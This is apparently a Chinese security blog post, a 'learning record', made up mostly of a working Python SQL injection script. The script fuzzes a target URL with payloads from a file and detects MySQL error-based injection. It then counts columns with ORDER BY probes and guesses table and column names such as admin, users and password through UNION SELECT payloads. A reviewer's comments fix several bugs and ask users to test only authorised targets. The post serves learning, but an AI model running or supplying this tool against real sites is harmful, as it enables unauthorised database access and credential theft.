【学习记录】编写初级SQL注入爆破脚本

# Learned from a video tutorial.
import math
import optparse
import threading

import requests
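# Command-line interface.
#
# NOTE(review): this script sends attack payloads (ORDER BY / UNION SELECT
# probes) to a live web application.  Only run it against targets you are
# explicitly authorised to test.
parser = optparse.OptionParser()
parser.usage = "sqlbp.py -u url -i inject_fuzz.txt"
parser.add_option(
    "-u", "--url",
    dest="url",
    help="url to test sql",
    action="store",
    type="string",
    metavar="URL",
)
parser.add_option(
    "-i", "--inject",
    dest="inject",
    help="fuzz filename",
    action="store",
    type="string",
    metavar="INJECT",
)
(options, args) = parser.parse_args()

# optparse has no `required=`; check by hand and exit with the usual usage
# error (status 2) instead of crashing further down with None values.
if options.url is None or options.inject is None:
    parser.error("both -u/--url and -i/--inject are required")

url = options.url
# The option's dest is "inject"; the original read `options.inject_file`,
# which does not exist and raised AttributeError on every run.
fuzz_file = options.inject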
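def get_urls(target=None, wordlist=None):
    """Build one request URL per payload by substituting ``FUZZ`` in *target*.

    Args:
        target: URL containing the literal marker ``FUZZ``; defaults to the
            module-level ``url`` parsed from the command line.
        wordlist: path of a text file with one payload per line; defaults to
            the module-level ``fuzz_file``.

    Returns:
        list[str]: the URLs in file order.  Surrounding whitespace is
        stripped from each payload and blank lines are skipped, so a stray
        empty line no longer yields a request with ``FUZZ`` simply deleted.

    Raises:
        ValueError: if *target* has no ``FUZZ`` marker -- every generated URL
            would be identical and nothing would actually be fuzzed.
        OSError: if *wordlist* cannot be opened.
    """
    if target is None:
        target = url
    if wordlist is None:
        wordlist = fuzz_file
    if "FUZZ" not in target:
        raise ValueError("url must contain the marker FUZZ: " + target)
    # errors="replace": an odd byte in the wordlist should not abort the run.
    with open(wordlist, "r", encoding="utf-8", errors="replace") as f:
        payloads = [line.strip() for line in f]
    return [target.replace("FUZZ", p) for p in payloads if p]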
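inject_urls = get_urls()
result_list = []    # URLs whose response contained the error marker (likely injectable)
is_injectable = []  # one True per hit; later stages only test len() > 0

# The original requests had no timeout, so a single stalled target hung the
# whole scan.  10 s is a plain default, not a tuned value.
REQUEST_TIMEOUT = 10
# Prefix of MySQL's "You have an error in your SQL syntax" error text.
ERROR_MARKER = "SQL syntax"


def test_sql() -> None:
    """Request every fuzzed URL and record those echoing a MySQL syntax error.

    Detection is error-based and MySQL-specific: a target that suppresses
    error output, or runs another DBMS, is reported as not injectable even
    when it is.  Hits are appended to the module-level ``result_list`` (the
    final URL after redirects) and ``is_injectable``.  A failed or timed-out
    request is reported and skipped rather than aborting the scan.
    """
    for item in inject_urls:
        try:
            r = requests.get(url=item, timeout=REQUEST_TIMEOUT)
        except requests.RequestException as exc:
            print("request failed, skipping: " + item + " (" + str(exc) + ")")
            continue
        if ERROR_MARKER in r.text:
            is_injectable.append(True)
            result_list.append(r.url)


test_sql()
if not result_list:
    print("no sql inject")
else:
    print("exist sql inject")
    for item in result_list:
        print(item)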
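# Stage 2: find how many columns the injectable query selects, so a later
# UNION SELECT can match it.  Method: ORDER BY 1, 2, 3, ... until the server
# answers "Unknown column"; the first failing index minus one is the count.
def detect_columns_num(max_columns: int = 100) -> int:
    """Return the column count of the injectable SELECT via ORDER BY probing.

    Args:
        max_columns: highest ORDER BY index to try (100, as in the original).

    Returns:
        int: the largest index that did *not* produce "Unknown column", or 0
        when the marker never appeared within *max_columns* probes or a
        request failed.  (The original fell out of its loop returning 99 in
        that case, and the later stages used that as a real column count.)

    The probe must read ``order+by+N``: the original concatenated ``"by"``
    straight onto the number, sending ``ORDER BY1`` -- a syntax error on
    every request, so the count could never be detected.
    """
    for i in range(1, max_columns + 1):
        temp_url = url.replace("FUZZ", "1'+order+by+" + str(i) + "--+")
        try:
            r = requests.get(temp_url, timeout=10)
        except requests.RequestException as exc:
            print("request failed, giving up on column count: " + str(exc))
            return 0
        # "Unknow" is a prefix of "Unknown column 'N' in 'order clause'".
        if "Unknow" in r.text:
            return i - 1
    return 0


if len(is_injectable) > 0:
    column = detect_columns_num()
    print("Find this table has " + str(column) + " columns")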
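# Stage 3: guess table names.  Payload shape:
#   -1'+union+select+1,2,3+from+<table>+--+
# where the number of selected values is the count found by the ORDER BY stage.
table_result = []  # candidate table names the server did not reject


def detect_table_name() -> None:
    """Probe a short built-in list of common table names with UNION SELECT.

    A name goes into the module-level ``table_result`` when the response does
    not contain "doesn't exist" (MySQL's "Table 'x' doesn't exist").  Any
    other outcome -- an empty page, a different DBMS, a WAF block page -- is
    therefore also counted as a hit, so treat the list as candidates rather
    than proof.  Reads the module-level ``url`` and ``column``.
    """
    # Without a column count the UNION cannot be shaped; the original would
    # have sent "union select  from ..." and accepted every table.
    if column < 1:
        print("column count unknown, skipping table detection")
        return
    # The original did `for i in column` over an int (TypeError); build the
    # "1,2,...,column" list explicitly.
    select_list = ",".join(str(i + 1) for i in range(column))
    table_list = ["admin", "admin123", "root", "administrator", "users", "emails", "referers"]
    key = "doesn't exist"
    for table_name in table_list:
        temp_url = url.replace(
            "FUZZ", "-1'+union+select+" + select_list + "+from+" + table_name + "+--+"
        )
        try:
            r = requests.get(temp_url, timeout=10)
        except requests.RequestException as exc:
            print("request failed, skipping: " + temp_url + " (" + str(exc) + ")")
            continue
        if key not in r.text:
            table_result.append(table_name)


if len(is_injectable) > 0:
    detect_table_name()
    print("Find these table_name in DB")
    for table in table_result:
        print(table)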
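column_result = []      # flat list of column names confirmed in some table
columns_by_table = {}   # table name -> list of column names found in it


def detect_column_name() -> None:
    """For each table found earlier, probe a built-in list of column names.

    Payload shape: ``-1'+union+select+<name>,2,3+from+<table>+--+`` -- the
    guessed name replaces the first selected value.  The name is accepted
    when the body lacks "Unknown column"; as in the table stage, any other
    failure mode also counts as a hit.  Fills the module-level
    ``column_result`` and ``columns_by_table``; reads ``url``, ``column``
    and ``table_result``.

    Two fixes over the original: (1) it built the select list with
    ``u.replace("1", name)``, which also rewrote the "1" inside "10", "11",
    ... once the column count reached 10; (2) it appended the *table* name
    to ``column_result`` once per missed column, so the report could not say
    which table a column belonged to -- the per-table dict replaces that.
    """
    key = "Unknown column"
    column_content = ["id", "user", "username", "password", "users"]
    for table in table_result:
        found = []
        for line in column_content:
            # Guessed name in slot 1, then 2..column as numeric placeholders.
            select_list = ",".join([line] + [str(i) for i in range(2, column + 1)])
            temp_url = url.replace(
                "FUZZ", "-1'+union+select+" + select_list + "+from+" + table + "+--+"
            )
            try:
                r = requests.get(temp_url, timeout=10)
            except requests.RequestException as exc:
                print("request failed, skipping: " + temp_url + " (" + str(exc) + ")")
                continue
            if key not in r.text:
                found.append(line)
        columns_by_table[table] = found
        column_result.extend(found)


if len(is_injectable) > 0:
    # The original defined detect_column_name() but never called it, so the
    # report below was always empty.
    detect_column_name()
    print("Find these column name")
    for table, names in columns_by_table.items():
        for line in names:
            print(line)
        print("上边的内容就是该表对应的字段名:" + table)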


原文始发于微信公众号(菜鸟小新):【学习记录】编写初级SQL注入爆破脚本

                   【学习记录】编写初级SQL注入爆破脚本http://cn-sec.com/archives/1157313.html

发表评论

匿名网友 填写信息